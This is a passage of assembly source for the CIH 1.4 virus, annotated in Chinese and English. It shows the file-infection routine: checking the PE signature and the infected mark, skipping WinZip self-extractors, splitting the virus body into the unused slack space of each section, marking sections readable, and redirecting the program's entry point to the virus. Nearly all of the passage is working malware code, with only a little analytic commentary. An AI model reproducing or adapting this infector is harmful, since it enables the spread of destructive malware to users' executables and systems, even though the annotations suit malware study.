_cih病毒1.4版本之中文注釋.txt
mov eax, ebp ;功能號(hào)
call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀文件到esi
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
; cmp [esi], '\0PE\0'
; The dword read above starts one byte BEFORE the "PE\0\0" signature (EDX = the
; signature pointer's former byte, see the register dump below), so this single
; compare both verifies the PE signature and checks that the byte in front of it
; is still 00 -- the infected mark set up later is presumably a nonzero byte
; written at exactly that position, which makes an already-infected file fail here.
cmp dword ptr [esi], 00455000h ;判斷是否是PE文件(標(biāo)志"PE\0\0")
jne CloseFile ;不是就關(guān)閉文件
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle ;保存文件句柄
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the           *
; * Virus' Infected Mark    *
; ***************************
; Parameters for a 1-byte write at file offset EDX (the byte just before the
; "PE\0\0" signature). The buffer pushed for it is EDI itself, i.e. the
; IFSMgr_Ring0_FileIO entry address, so the byte written is the first opcode
; byte of that routine -- presumably chosen because it is nonzero, which is
; what the '\0PE\0' compare above rejects on the next encounter of this file.
; (The push edi is therefore intentional, not a mistaken comment.)
push 01h ; Size
push edx ; Pointer of File ;edx指向PE文件頭偏移00h
push edi ; Address of Buffer ;edi為IFSMgr_Ring0_FileIO的地址(原注釋有誤)
; ***************************
; * Save ESP Register       *
; ***************************
; ESP is parked in debug register DR1 (accessible only at ring 0, which this
; VxD-level code runs at). It is restored at OnlySetInfectedMark, discarding
; every parameter set pushed after this point so that only the infected-mark
; write above remains on the stack when the file cannot hold the virus body.
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead ;要讀2個(gè)字節(jié)(WORD NumberOfSections)
add edx, 07h ; Move EDX to NumberOfSections ;PE文件頭+07h為NumberOfSections(塊個(gè)數(shù))
call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀出NumberOfSections(塊個(gè)數(shù))到esi
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h] ;edx為SectionTable的偏移
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable ;每個(gè)塊表項(xiàng)(ScetionTable)的大小(字節(jié))
; Assumes NumberOfSections <= 0ffh: only its low byte is loaded into CL below and
; the 8-bit MUL yields AX = SizeOfScetionTable * CL, so a header that claims more
; than 255 sections produces a truncated section-table size here. There is no
; explicit range check on the value read from the file.
mov cl, (NumberOfSections-@8)[esi]
mul cl ;每個(gè)塊表項(xiàng)乘以塊個(gè)數(shù)=塊表大小
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi] ;esi指向塊表首址(在病毒動(dòng)態(tài)數(shù)據(jù)區(qū)中)
push eax ; Size ;塊表大小
push edx ; Pointer of File ;edx為SectionTable的偏移
push esi ; Address of Buffer ;
; ***************************
; * The first chunk of the  *
; * merged virus code plus  *
; * the virus code section  *
; * table must fit in the   *
; * unused space between    *
; * the end of the section  *
; * table and SizeOfHeaders *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h ;*8
push ecx ; Save TotalSizeOfVirusCodeSectionTable ;預(yù)留病毒塊表空間
add ecx, eax
add ecx, edx ;ecx+文件的正文的偏移
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx ;求補(bǔ)
; ECX = SizeOfHeaders - (section-table file offset + section-table size
;       + reserved virus-code-section-table size) = unused header space.
; The value goes negative when the headers leave no room; the CMP/JL pair
; below is a signed compare (on the low word only), so that case also
; branches to OnlySetInfectedMark instead of being treated as a huge size.
; Save the space available for the virus' first code chunk in the unused
; area after the section table. The virus code section table's own size
; has already been subtracted above, so it is not included in this value.
push ecx
xchg ecx, eax ; ECX = Size of Section Table ;ecx為塊表大小
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址
add eax, (ImageBase-@9)[esi] ;裝入基址
mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存裝入后實(shí)際的入口地址
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空間和病毒第一塊大小比較
jl OnlySetInfectedMark ;小于就只設(shè)感染標(biāo)志
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp ;讀的功能號(hào)
call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀塊表到esi(@9處)
; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
xchg eax, ebp
push 00000004h
pop ecx ;讀4字節(jié)
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx為第二塊的偏移(.rdata)
add edx, 12h ;加10h+2h(10h處為"WinZip....")
call edi ; VXDCall IFSMgr_Ring0_FileIO ;讀4字節(jié)到esi
; cmp [esi], 'nZip'
cmp dword ptr [esi], 'piZn' ;判斷是否是WinZip自解壓文件
je NotSetInfectedMark ;是就不設(shè)置感染標(biāo)志
pop edx ;edx指向塊表在文件中首址
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx ; 未用空間大小
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp ; ebp為塊表大小
push edx ; Pointer of File ;指向塊表后(第一塊)
add ebp, esi ; ebp指向病毒數(shù)據(jù)區(qū)的塊表后(第一塊)
push ebp ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [ebp+edi-04h]
mov [eax], ebx ;設(shè)置病毒代碼第一塊的大小(未用空間大小)到病毒塊表
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size ;病毒代碼第一塊的大小(未用空間大小)
add edx, edi
push edx ; Pointer of File ;指向塊表后(第一塊)+Size??=病毒正文(病毒開始處)
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer ;指向病毒開始處
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文)
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable] ;edx先減一項(xiàng)塊表長度,以配合下面的"助標(biāo)1"
mov ebp, offset VirusSize ;ebp為病毒長度
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable ;助標(biāo)1:
; EDX now points at the next section-table entry (continuation of the note above)
mov ebx, (SizeOfRawData-@9)[edx] ;ebx為該塊表項(xiàng)的SizeOfRawData(塊大小)
sub ebx, (VirtualSize-@9)[edx] ;減去VirtualSize=該塊未用空間
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx ;寫入病毒塊表
mov ebx, (PointerToRawData-@9)[edx] ;ebx為塊的物理(實(shí)際)偏移?
add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize
push ebx ; Pointer of File ;ebx指向該塊未用空間的文件指針
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi] ;ebx為該塊裝入后的實(shí)際地址
mov [eax+4], ebx ;保存到病毒塊表中
mov ebx, [eax] ;該塊未用空間大小
add (VirtualSize-@9)[edx], ebx ;加到該塊表項(xiàng)的VirtualSize
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h ;改該塊表項(xiàng)的塊屬性(改為可讀,并包含初始化數(shù)據(jù))
StartToWriteCodeToSections:
sub ebp, ebx ;病毒大小-病毒塊大小
jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完畢)就設(shè)置病毒塊表結(jié)束符
add edi, ebx ; Move Address of Buffer ;指向病毒下一塊
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1 ;只設(shè)置感染標(biāo)志
jmp WriteVirusCodeToFile ;跳到寫病毒到要傳染的文件的程序
; ***************************
;